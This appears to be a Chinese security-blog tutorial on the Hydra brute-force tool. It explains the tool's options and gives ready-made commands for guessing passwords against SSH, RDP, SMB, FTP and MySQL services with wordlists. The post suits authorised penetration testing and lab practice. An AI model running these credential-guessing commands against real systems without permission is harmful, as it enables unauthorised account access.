hydra

渗透

发布日期: 2023-11-08

更新日期: 2023-11-08

文章字数: 499

阅读时长: 2 分

阅读次数:

简介

Hydra也叫九头蛇，是一款开源的暴力PJ工具，集成在kali当中。

参数：
-l 指定用户名
-p 指定密码
-L 指定用户名字典
-P 指定密码字典
-C 指定所用格式为“user:password”的字典文件
-e
	n null，表示尝试空密码
	s same，把用户名本身当做密码进行尝试
	r 反向，把用户名倒叙，当做密码进行尝试。
-vV 显示执行细节
-o 保存执行结果
-s 指定非默认端口
-M 指定破解的目标文件，如果不是默认端口，后面跟上“:port”
-t 指定爆破时的任务数量（默认16）

简单使用

在kaili里直接输入hydra

爆破SSH

用 -l 参数指定用户名，-p参数指定密码，后面直接跟目标的IP地址和协议。

hydra -l root -p 12345678 IP ssh

成功的话会把账号密码高亮显示出来

另外一种格式

hydra -l root -p 12345678 ssh://IP

使用字典爆破

小写的 -p 是指定密码，大写的 -P是指定字典文件。

hydra -l root -P 密码字典 IP ssh

加上-vV参数可以显示执行细节

hydra -l root -P 密码字典 IP ssh -vV

这里的密码字典的路径可以是相对路径也可以是绝对路径

hydra -l root -P pwd.txt IP ssh -vV
or
hydra -l root -P /home/kali/pwd.txt IP ssh -vV

SSH协议的默认用户是 root，所以上面我们都是指定的用户名，如果不确定用户名，就要指定用户名字典，比如下面这种格式：

hydra -L /home/kali/user.txt -P /home/kali/pwd.txt IP ssh

爆破其他协议服务时，把协议名和默认用户名换一下就可以了。

hydra常见的爆破服务

RDP

hydra -l administrator -P pwd.txt IP rdp

SMB

hydra -l administrator -P pwd.txt IP smb

FTP

hydra -l user -P pwd.txt IP ftp

mysql

hydra -l user -P pwd.txt IP mysql

参考文章：https://blog.csdn.net/wangyuxiang946/article/details/128194559

f14g

http://example.com/2023/11/08/hydra/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 f14g !

hydra

raven-1

2023-11-08 vulnhub

vulnhub

breach 1.0

2023-11-01 vulnhub

vulnhub

简介

简单使用

爆破SSH

使用字典爆破

hydra常见的爆破服务

你的赏识是我前进的动力